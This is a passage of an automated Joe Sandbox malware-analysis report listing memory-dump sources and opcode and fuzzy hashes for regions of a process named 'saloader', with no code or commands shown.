                                                                                          • Instruction Fuzzy Hash: C801C075C8E6CA9FEB479B6448554E57FB0EF87210F0850E6E88CC6093E918999A8391
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20e1095aa9003c73e95e455e9c00a3fdb22912874f0e841e7177f28d7ab9e310
                                                                                          • Instruction ID: 0a197710ebeadfe982d5511eecc18627825d0efe681aff2dfed8ab46a91b7514
                                                                                          • Opcode Fuzzy Hash: 20e1095aa9003c73e95e455e9c00a3fdb22912874f0e841e7177f28d7ab9e310
                                                                                          • Instruction Fuzzy Hash: AA11B731519D0A8FEFA9EB1DC094E6577E0FF2A315B4904A8D05EC76A1DB25EC84CB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5d8975663ebf3ba8c1e8db1a106ddf077f1f5b105edb4a07fcc32ebd13e69c86
                                                                                          • Instruction ID: 34ee110fd15b8c051eabac106520d857a0cac0f38bcc00f9fcfcf5e87ad12eea
                                                                                          • Opcode Fuzzy Hash: 5d8975663ebf3ba8c1e8db1a106ddf077f1f5b105edb4a07fcc32ebd13e69c86
                                                                                          • Instruction Fuzzy Hash: D401281054E58A4FE34BA738D8696B13BE1EF87201B0C91BAE14CC7197D91DE886C3C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 239016bb814a6cf82939469841fd8a4967c599b27ad1f8e77994488186848bf6
                                                                                          • Instruction ID: 6b01691a22398eeb4cdfb8735780300faefc26a662bff669afc6bea85f814a5b
                                                                                          • Opcode Fuzzy Hash: 6bd7f6b50459fdaf540d2358b65b7fa7611e44ab6028f61bb12d3a7d5ba9c10d
                                                                                          • Instruction Fuzzy Hash: 6CE0C265F5580A8EBE01F374A89AAFDB296FF95201FC09872E10EC3083CD1CA4050581
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ddf28ec69cc24c7204644c8f90048cd79314146f8607bb52fbb76ec34feb2442
                                                                                          • Instruction ID: 2bc3b76e433f6c10ab1cdd8c3566a57d02f664ed85438a9c91286d66fddbeb25
                                                                                          • Opcode Fuzzy Hash: ddf28ec69cc24c7204644c8f90048cd79314146f8607bb52fbb76ec34feb2442
                                                                                          • Instruction Fuzzy Hash: B3E0C261EA980E4ABE40F370A85A9FDB296EF89200FC0A871E00EC3083CD18A4040581
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bef5b56af87d4ddeb76384626ec546ed0cb516716dbd770739bd6dc881ce29a9
                                                                                          • Instruction ID: 0d1605915ae8f6d9af631c8aaf6e58fba2076f72e82d3fabc19e9fa2a3c2d3c0
                                                                                          • Opcode Fuzzy Hash: bef5b56af87d4ddeb76384626ec546ed0cb516716dbd770739bd6dc881ce29a9
                                                                                          • Instruction Fuzzy Hash: DBD01772F5E5099CB556A34C74031FCF289EB83230B50B037E14E81482FE2EA01B21C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5abdfdfbbf48bbe038f141ba4857a87f2d625737362ebaceb9bfd325e916d5bf
                                                                                          • Instruction ID: 70b9133505960f10bb12dc62a6883707f09e3c57c8fb4c498baf88165fc18fa0
                                                                                          • Opcode Fuzzy Hash: 5abdfdfbbf48bbe038f141ba4857a87f2d625737362ebaceb9bfd325e916d5bf
                                                                                          • Instruction Fuzzy Hash: 5CE04F71448B488FC304DF58D4409DAFBE0FF94360F400B6EF05AC21B1DBB491828A82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2ce4551a31baa393bd922c6027d9734c780f8a59dd35b87957a07350d5af1bfc
                                                                                          • Instruction ID: 589d02cae22d260f768f024dcb090064f5f35d8adf1e58c7d49a6d909a8623b7
                                                                                          • Opcode Fuzzy Hash: 2ce4551a31baa393bd922c6027d9734c780f8a59dd35b87957a07350d5af1bfc
                                                                                          • Instruction Fuzzy Hash: 2FE0E671418B458BC345DF18D4405DAB7A0FF94320F405B6EF09996195DB7492458782
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 04d08ed15590fc859f0c973526256979226cf994c8ecccdf738a706e6dc5f63f
                                                                                          • Instruction ID: 77f8990431f8b040c187d8609cac62f7a3594aef5132e1faadbcb5b030c7074b
                                                                                          • Opcode Fuzzy Hash: 04d08ed15590fc859f0c973526256979226cf994c8ecccdf738a706e6dc5f63f
                                                                                          • Instruction Fuzzy Hash: 8ED0A71691E745D7F946470424011B477B1E752510F444163F05A82042DC15DC8B4291
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0712cdd95b1de2a122ac57e2035adfd90b50b75d48a1970a8bf3d8c914a4a80
                                                                                          • Instruction ID: 6797140dde2370f4e64692475526f815d393bf0211221f3d1067db44535fb048
                                                                                          • Opcode Fuzzy Hash: f0712cdd95b1de2a122ac57e2035adfd90b50b75d48a1970a8bf3d8c914a4a80
                                                                                          • Instruction Fuzzy Hash: 65E0EC72408B498AD355DF58E4405EAF7A0FB95360F404B7EE059862A5DEA4A2898B82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ab969f9773e5e690e215cf563c2c7aa9b79a8f6ab3b15141c401ca981cea5cf
                                                                                          • Instruction ID: 7fb8edf88ab34d36bafc018d1ad09b38e2b9a6db31ee2a7aa6b06374c2ce09ed
                                                                                          • Opcode Fuzzy Hash: 8ab969f9773e5e690e215cf563c2c7aa9b79a8f6ab3b15141c401ca981cea5cf
                                                                                          • Instruction Fuzzy Hash: 5BC0124794994E83FB968244B0127F5B3C0DB91210F506571A06945159ED09E98B0DC2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e9f170af393b9fd656cd01d960b5f83796a7ec6ddf357dbc2a4eff506d08a8f5
                                                                                          • Instruction ID: 1198430d4849f77d0731d41b0aebf6caaeef21ddaaf391e0c7b17faf93a940ba
                                                                                          • Opcode Fuzzy Hash: e9f170af393b9fd656cd01d960b5f83796a7ec6ddf357dbc2a4eff506d08a8f5
                                                                                          • Instruction Fuzzy Hash: 7CC02262C4AB028AE6A0CB04B0029E0B3C0DF83240F406220E01E4618AED5C948E42C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 66789407ee9cb0e4ae484d92a30e995b28be99450c38b17713358447b2394f38
                                                                                          • Instruction ID: 882bae50644742744b9792de91c58211978d99c0c76e81cc3d040a467046dda0
                                                                                          • Opcode Fuzzy Hash: 66789407ee9cb0e4ae484d92a30e995b28be99450c38b17713358447b2394f38
                                                                                          • Instruction Fuzzy Hash: 85C09B33A4E115CCB61851DD74430FCB360DB87135F146177D35E510425E0B703E05D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0a967d9f681e37617221f57410663118a5e1eb23d4a76320deb00c813a0c2de
                                                                                          • Instruction ID: c8ecd21302bce5138cc04c4a018dd52e82e0722668a48e5566e4753d81feb055
                                                                                          • Opcode Fuzzy Hash: e0a967d9f681e37617221f57410663118a5e1eb23d4a76320deb00c813a0c2de
                                                                                          • Instruction Fuzzy Hash: 4AC02202C0AF0285F1E19204B0019F16BC0C392210F90A834A01E41048F808988E8FC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca16f8af4fdcfc0bf9dc299d2b757b0d9a09f5f62a2b12dea92d1593603020f6
                                                                                          • Instruction ID: 0afb06efb8d7eb07e99d2046d18426b6400f212ccfe3f055525fdbe7a9d5ec60
                                                                                          • Opcode Fuzzy Hash: ca16f8af4fdcfc0bf9dc299d2b757b0d9a09f5f62a2b12dea92d1593603020f6
                                                                                          • Instruction Fuzzy Hash: 5CC02B02F1D8394BB090930C3C010B89381FBC92307207273D00DC328DCC1CD84501C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 10c9a8c8d4444bdca211e0dbadc9c2379363d516f6c20f40411be491175bd574
                                                                                          • Instruction ID: df3a4580253e317950c23f875652f61933c046b536755388214f7ab20915764b
                                                                                          • Opcode Fuzzy Hash: 10c9a8c8d4444bdca211e0dbadc9c2379363d516f6c20f40411be491175bd574
                                                                                          • Instruction Fuzzy Hash: 6AC08C01F1D92946B1A0930C38011B8D281AB841307107273D00DC128DEC08988902C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b2e2a0555a972341056d29b9aa94804f3eff4a9a8cd82e696c033df7e0617d9e
                                                                                          • Instruction ID: 5d2f3dc971a988b64db8c631ba46aab40edb1dff5df05fe8f333af162c69f49c
                                                                                          • Opcode Fuzzy Hash: b2e2a0555a972341056d29b9aa94804f3eff4a9a8cd82e696c033df7e0617d9e
                                                                                          • Instruction Fuzzy Hash: CCC08C02B1D9394AB090920C38010B89281AB89130B207273D00DC228DCC18988501C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78c92a72e169921e61de770fcce756af8449f145a93f922f9a6bfcc0565ef751
                                                                                          • Instruction ID: e24e8f594492e40cd0765362249274668428b236584e1bc1be7d191e547ad993
                                                                                          • Opcode Fuzzy Hash: 78c92a72e169921e61de770fcce756af8449f145a93f922f9a6bfcc0565ef751
                                                                                          • Instruction Fuzzy Hash: 86C02213428A964AA6E0872CA8068A52750EB82320F8887B9F00C862CADE14C0074182
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8699462b5035645071484dc5650ab15bc7ba1d4647d03c83aaae5418ca0a5ae
                                                                                          • Instruction ID: 8b27e28fd21d741ce9d0b2837b4c6d7a27df00f4852b183ba68e3bd4a8c09f4c
                                                                                          • Opcode Fuzzy Hash: e8699462b5035645071484dc5650ab15bc7ba1d4647d03c83aaae5418ca0a5ae
                                                                                          • Instruction Fuzzy Hash: 6DC0123340D60D86E305A705E4415EBB3B1BF91310F444B79E04A45195DE58A64D86C1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7e4fbbf8af21ba1de7471dfd03d36a507f43acf24c28c56fa5cb58467481812
                                                                                          • Instruction ID: 1ae8662be5764cc8bfaa29002e33f28e0b9a98402140718e09725b06f50c8fb0
                                                                                          • Opcode Fuzzy Hash: e7e4fbbf8af21ba1de7471dfd03d36a507f43acf24c28c56fa5cb58467481812